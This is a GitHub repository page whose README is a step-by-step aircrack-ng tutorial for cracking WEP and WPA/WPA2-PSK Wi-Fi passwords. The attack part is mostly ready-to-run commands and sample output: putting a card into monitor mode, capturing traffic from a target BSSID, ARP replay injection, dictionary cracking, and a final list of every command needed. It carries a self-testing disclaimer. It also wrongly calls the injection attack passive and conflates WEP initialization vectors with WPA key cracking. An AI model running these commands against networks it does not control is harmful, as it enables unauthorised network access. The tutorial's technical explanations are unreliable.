https://github.com/david-palma/wifi-cracking

Crack 802.11 WEP and WPA/WPA2-PSK keys using Aircrack-ng suite
https://github.com/david-palma/wifi-cracking

aircrack-ng education hack hacking infosec penetration-testing practice security tutorial wep wifi wifi-cracking wpa wpa2

Last synced: 3 months ago
JSON representation

Crack 802.11 WEP and WPA/WPA2-PSK keys using Aircrack-ng suite

• Host: GitHub
• URL: https://github.com/david-palma/wifi-cracking
• Owner: david-palma
• License: mit
• Created: 2019-06-09T23:05:31.000Z (over 5 years ago)
• Default Branch: master
• Last Pushed: 2023-05-27T08:18:43.000Z (over 1 year ago)
• Last Synced: 2024-07-22T10:36:22.970Z (4 months ago)
• Topics: aircrack-ng, education, hack, hacking, infosec, penetration-testing, practice, security, tutorial, wep, wifi, wifi-cracking, wpa, wpa2
• Homepage:
• Size: 7.81 KB
• Stars: 24
• Watchers: 1
• Forks: 3
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
# Wi-Fi cracking with aircrack-ng

[Aircrack-ng](https://aircrack-ng.org/) is basically a network software suite that has been crafted to achieve the following objectives:

* packet sniffing

* attacking (replay attacks, deauthentication, fake access points...) via packet injection

* testing Wi-Fi cards and driver capabilities (capture and injection)

* cracking WEP and WPA/WPA2 Wi-Fi routers

Note that the present tutorial is not an exhaustive guide, rather it is intended to build some basic skills to test your own network's security and get familiar with the concepts.

The attack outlined below is based on a passive technique (ARP request replay attack) and it focuses on debian-based distributions assuming you have a working wireless card with drivers already patched for injection.

## Aircrack-ng installation

Aircrack-ng can be installed on a debian-based operating system by compiling the source code (for more details you can visit the [official website](https://aircrack-ng.org/)).

### Installing required and optional dependencies

Below you can find instructions for installing the basic requirements to build aircrack-ng for Debian-based operating systems.

```ShellSession

$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils

```

Get the latest copy of aircrack-ng:

```ShellSession

$ git clone https://github.com/aircrack-ng/aircrack-ng

$ cd aircrack-ng

```

### Compiling and installing

To build aircrack-ng, the Autotools build system is used.

First, `./configure` the project for building with the appropriate options:

```ShellSession

$ autoreconf -i

$ ./configure --with-experimental

```

Next, compile the project with the `make` command and use the "installing" target from the additional targets listed below to complete the installation.

* Execute all unit testing: `make check`

* Execute all integration testing (requires root): `make integration`

* Installing: `make install`

* Uninstall: `make uninstall`

## Test wireless device packet injection

The purpose of this step ensures that your card successfully supports injection.

Assuming your interface name is "wlan0" (you can retrieve it typing `iwconfig` on the terminal), type the following command:

```ShellSession

# aireplay-ng --test wlan0

```

The system responds:

```ShellSession

18:10:59  wlan0 channel: 10

18:10:59  Trying broadcast probe requests...

18:10:59  Injection is working!

18:11:00  Found 1 AP

...

```

This confirms your card can inject packets.

## Simple sniffing and cracking

### 1. Start the wireless interface in monitor mode

The first thing to do is looking out for a potential target putting your wireless card into monitor mode using `airmon-ng`. However, it is strongly recommended to `kill` all interfering processes prior to using the aircrack-ng suite.

```ShellSession

# airmon-ng check kill

Killing these processes:

  PID Name

  870 dhclient

 1115 wpa_supplicant

```

Then, it is possible to enable the monitor mode used to create another interface (mon0):

```ShellSession

# airmon-ng start wlan0

PHY         Interface       Driver         Chipset

phy0        wlan0           ath9k          Qualcomm Atheros AR9485

                               (monitor mode enabled for [phy0]wlan0 on [phy0]mon0)

```

You will notice that "wlan0" has successfully been put into monitor mode.

Then, start `airodump-ng` to look out for networks:

```ShellSession

# airodump-ng mon0

```

Locate the wireless network you want to crack, and note its BSSID and channel from the following output:

```ShellSession

CH 10 ][ Elapsed: 36 s][2019-05-15 18:15

BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB  ENC  CIPHER AUTH ESSID

08:00:BF:E6:31:2E  -21  100     5240  178307  338  10  54  WPA  CCMP   PSK  infosec_router

...

```

Note that the top part of the output lists information about APs in range, and the bottom part lists clients connected to the corresponding APs.

### 2. Start airodump-ng to capture the initial vectors

Open another console session to capture the initial vectors generated by the target and to save the result into a file:

```ShellSession

# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0

```

where `-c 10` is the channel for the wireless network, `--bssid 08:00:BF:E6:31:2E` is the MAC address of the AP, `-w output-file` defines the output files that will contain the initialization vectors, and `mon0` is the interface name.

The system responds:

```ShellSession

CH 10 ][ Elapsed: 12 s][2019-05-15 18:16

BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB  ENC  CIPHER AUTH ESSID

08:00:BF:E6:31:2E  -21  100     5240  178307  338  10  54  WPA  CCMP   PSK  infosec_router

BSSID              STATION            PWR  Lost  Packets  Probes

08:00:BF:E6:31:2E  00:0F:35:51:AC:22  -21     0   183782

```

After the execution of the command various files will be generated.

### 3. Start aireplay-ng in ARP request replay mode

The classic ARP request replay attack is the most effective way to generate new initialization vectors, and works very reliably. The purpose of this step is to start `aireplay-ng` in a mode which listens for ARP requests then reinjects them back to the access point.

Keep your `airodump-ng` and `aireplay-ng` running, open another terminal and run the ARP request replay attack:

```ShellSession

# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0

Saving ARP requests in replay_arp-0321-191525.cap

You should also start airodump-ng to capture replies.

Read 618643 packets (got 304896 ARP requests), sent 194947 packets...

```

You can check if the packets are injected by looking at the `airodump-ng` screen.

### Run aircrack-ng to obtain the WPA key

At this point, you should be able to obtain the WPA key from the initialization vectors gathered in the previous steps. To perform this attack you need a wordlist and if the network password is not in the wordfile you will not crack the password. Note that most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the [WPA-length password lists](https://github.com/david-palma/wordlists#passwords-with-wpa-length).

Open another console session and type:

```ShellSession

# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap

```

where `-a2` specifies the attack mode for WPA/WPA2-PSK,  `-w wordlist.txt` refers to your own dictionary wordlist, and `output*.cap` selects all output files with `.cap` extension.

This is the output of a successful attack:

```ShellSession

                        Aircrack-ng 1.5.2

[00:00:00] 192/1229 keys tested (520.04 k/s)

Time left: 0 seconds                                      15.62%

                     KEY FOUND! [ notsecure ]

Master Key     : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA

                 06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63

Transient Key  : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3

                 86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E

                 4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A

                 90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A

EAPOL HMAC     : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68

```

## List of commands

Below you can find the list of all of the commands needed to crack a WPA/WPA2 network.

```

# kill all interfering processes prior to using the aircrack-ng

airmon-ng check kill

# put your network device into monitor mode

airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel

airodump-ng mon0

# start listening for the handshake on a new console session

airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0

# start the ARP request replay attack

aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0

# run aircrack-ng to obtain the WPA key

aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap

```

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Disclaimer

This tutorial has been made for educational purposes only, I don't promote malicious practices and I will not be responsible for any illegal activities.